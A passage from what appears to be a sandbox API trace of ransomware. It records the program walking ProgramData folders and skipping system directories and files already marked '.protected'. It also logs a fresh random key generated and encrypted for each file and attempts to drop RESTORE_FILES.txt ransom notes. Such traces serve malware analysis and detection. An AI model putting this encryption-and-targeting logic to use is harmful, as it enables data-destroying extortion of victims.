lpString2="..") returned 0 [0093.220] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.220] lstrcmpiW (lpString1="Cache", lpString2="Windows") returned -1 [0093.220] lstrcmpiW (lpString1="Cache", lpString2="Program Files") returned -1 [0093.220] lstrcmpiW (lpString1="Cache", lpString2="Program Files (x86)") returned -1 [0093.220] lstrcmpiW (lpString1="Cache", lpString2="$Recycle.bin") returned 1 [0093.220] lstrcmpiW (lpString1="Cache", lpString2="System Volume Information") returned -1 [0093.220] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache") returned 71 [0093.220] lstrcmpW (lpString1="Cache", lpString2=".") returned 1 [0093.220] lstrcmpW (lpString1="Cache", lpString2="..") returned 1 [0093.220] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, 
pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*") returned 73 [0093.220] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.221] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.221] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.221] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.221] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.221] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.221] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\.") returned 73 [0093.221] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.221] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.221] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.221] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.221] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.221] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.221] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.221] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\..") returned 74 [0093.221] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.221] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.221] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.221] lstrcmpiW (lpString1="cache.dat.protected", lpString2="Windows") 
returned -1 [0093.221] lstrcmpiW (lpString1="cache.dat.protected", lpString2="Program Files") returned -1 [0093.221] lstrcmpiW (lpString1="cache.dat.protected", lpString2="Program Files (x86)") returned -1 [0093.221] lstrcmpiW (lpString1="cache.dat.protected", lpString2="$Recycle.bin") returned 1 [0093.221] lstrcmpiW (lpString1="cache.dat.protected", lpString2="System Volume Information") returned -1 [0093.221] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.protected") returned 91 [0093.221] StrStrIW (lpFirst="cache.dat.protected", lpSrch=".protected") returned=".protected" [0093.221] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.221] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.221] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.221] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.221] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.221] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.221] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\RESTORE_FILES.txt") returned 89 [0093.221] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.221] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.221] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.221] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.222] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\RESTORE_FILES.txt") returned 89 [0093.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\cache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.222] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.222] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.222] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.222] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.222] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.222] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.222] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\RESTORE_FILES.txt") returned 83 [0093.222] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.222] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.222] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.222] lstrcmpiW (lpString1="tokens.dat.protected", lpString2="Windows") returned -1 [0093.222] lstrcmpiW (lpString1="tokens.dat.protected", lpString2="Program Files") returned 1 [0093.222] lstrcmpiW (lpString1="tokens.dat.protected", lpString2="Program Files (x86)") returned 1 [0093.222] lstrcmpiW (lpString1="tokens.dat.protected", lpString2="$Recycle.bin") returned 1 [0093.222] lstrcmpiW 
(lpString1="tokens.dat.protected", lpString2="System Volume Information") returned 1 [0093.222] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.protected") returned 86 [0093.222] StrStrIW (lpFirst="tokens.dat.protected", lpSrch=".protected") returned=".protected" [0093.222] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.222] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.222] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\RESTORE_FILES.txt") returned 83 [0093.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.223] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.223] lstrcmpiW (lpString1="RAC", lpString2="Windows") returned -1 [0093.223] lstrcmpiW (lpString1="RAC", lpString2="Program Files") returned 1 [0093.223] lstrcmpiW (lpString1="RAC", lpString2="Program Files (x86)") returned 1 [0093.223] lstrcmpiW (lpString1="RAC", lpString2="$Recycle.bin") returned 1 [0093.223] lstrcmpiW (lpString1="RAC", lpString2="System Volume Information") returned -1 [0093.223] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC") returned 36 [0093.223] lstrcmpW (lpString1="RAC", lpString2=".") returned 1 [0093.223] lstrcmpW (lpString1="RAC", lpString2="..") returned 1 [0093.223] wnsprintfW (in: 
pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*") returned 38 [0093.223] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.224] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.224] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.224] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.224] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.224] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.224] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\.") returned 38 [0093.224] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.224] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.224] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.224] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.224] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.224] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.224] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.224] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\..") returned 39 [0093.224] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.224] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.224] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.224] lstrcmpiW (lpString1="Outbound", lpString2="Windows") returned -1 [0093.224] lstrcmpiW (lpString1="Outbound", lpString2="Program Files") returned -1 [0093.224] lstrcmpiW 
(lpString1="Outbound", lpString2="Program Files (x86)") returned -1 [0093.224] lstrcmpiW (lpString1="Outbound", lpString2="$Recycle.bin") returned 1 [0093.224] lstrcmpiW (lpString1="Outbound", lpString2="System Volume Information") returned -1 [0093.224] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound") returned 45 [0093.224] lstrcmpW (lpString1="Outbound", lpString2=".") returned 1 [0093.224] lstrcmpW (lpString1="Outbound", lpString2="..") returned 1 [0093.224] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\*") returned 47 [0093.224] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.225] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.225] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.225] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.225] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.225] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.225] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\.") returned 47 [0093.225] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.225] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.225] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.225] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.225] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.225] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.225] lstrcmpiW (lpString1="..", lpString2="System Volume Information") 
returned -1 [0093.225] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\..") returned 48 [0093.225] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.225] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.225] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.225] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.225] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.225] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.225] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.225] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.225] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\RESTORE_FILES.txt") returned 63 [0093.225] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.225] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.225] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.225] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.225] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\RESTORE_FILES.txt") returned 63 [0093.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\rac\\outbound\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.225] 
FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.225] lstrcmpiW (lpString1="PublishedData", lpString2="Windows") returned -1 [0093.225] lstrcmpiW (lpString1="PublishedData", lpString2="Program Files") returned 1 [0093.226] lstrcmpiW (lpString1="PublishedData", lpString2="Program Files (x86)") returned 1 [0093.226] lstrcmpiW (lpString1="PublishedData", lpString2="$Recycle.bin") returned 1 [0093.226] lstrcmpiW (lpString1="PublishedData", lpString2="System Volume Information") returned -1 [0093.226] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData") returned 50 [0093.226] lstrcmpW (lpString1="PublishedData", lpString2=".") returned 1 [0093.226] lstrcmpW (lpString1="PublishedData", lpString2="..") returned 1 [0093.226] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\*") returned 52 [0093.226] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.226] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.226] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.226] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.226] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.226] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\.") returned 52 [0093.226] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.226] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.226] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\RAC\\PublishedData\\..") returned 53 [0093.226] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.226] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.226] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.226] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf") returned 69 [0093.226] StrStrIW (lpFirst="RacWmiDatabase.sdf", lpSrch=".protected") returned 0x0 [0093.226] lstrcmpW (lpString1="RacWmiDatabase.sdf", lpString2="RESTORE_FILES.txt") returned -1 [0093.226] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.226] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.226] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.226] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.226] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.227] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.227] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.227] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.227] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RESTORE_FILES.txt") returned 68 [0093.227] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.227] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.227] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.227] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.227] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RESTORE_FILES.txt") returned 68 [0093.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.228] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.228] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.228] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.228] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.228] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.228] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.228] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\RESTORE_FILES.txt") returned 54 [0093.228] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.228] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.228] 
FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.228] lstrcmpiW (lpString1="StateData", lpString2="Windows") returned -1 [0093.228] lstrcmpiW (lpString1="StateData", lpString2="Program Files") returned 1 [0093.228] lstrcmpiW (lpString1="StateData", lpString2="Program Files (x86)") returned 1 [0093.228] lstrcmpiW (lpString1="StateData", lpString2="$Recycle.bin") returned 1 [0093.228] lstrcmpiW (lpString1="StateData", lpString2="System Volume Information") returned -1 [0093.228] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData") returned 46 [0093.228] lstrcmpW (lpString1="StateData", lpString2=".") returned 1 [0093.228] lstrcmpW (lpString1="StateData", lpString2="..") returned 1 [0093.228] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*") returned 48 [0093.228] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.228] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.228] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.228] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.228] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.228] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.228] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\.") returned 48 [0093.228] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.228] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.228] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.228] 
lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.228] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.228] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.228] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.228] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\..") returned 49 [0093.228] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.228] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.229] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.229] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="Windows") returned -1 [0093.229] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="Program Files") returned 1 [0093.229] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="Program Files (x86)") returned 1 [0093.229] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="$Recycle.bin") returned 1 [0093.229] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="System Volume Information") returned -1 [0093.229] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf") returned 62 [0093.229] StrStrIW (lpFirst="RacDatabase.sdf", lpSrch=".protected") returned 0x0 [0093.229] lstrcmpW (lpString1="RacDatabase.sdf", lpString2="RESTORE_FILES.txt") returned -1 [0093.229] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.229] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all 
users\\microsoft\\rac\\statedata\\racdatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.229] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.229] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="Windows") returned -1 [0093.229] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="Program Files") returned 1 [0093.229] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="Program Files (x86)") returned 1 [0093.229] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="$Recycle.bin") returned 1 [0093.229] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="System Volume Information") returned -1 [0093.229] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacMetaData.dat") returned 62 [0093.229] StrStrIW (lpFirst="RacMetaData.dat", lpSrch=".protected") returned 0x0 [0093.229] lstrcmpW (lpString1="RacMetaData.dat", lpString2="RESTORE_FILES.txt") returned -1 [0093.229] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.229] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racmetadata.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.229] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.229] lstrcmpiW 
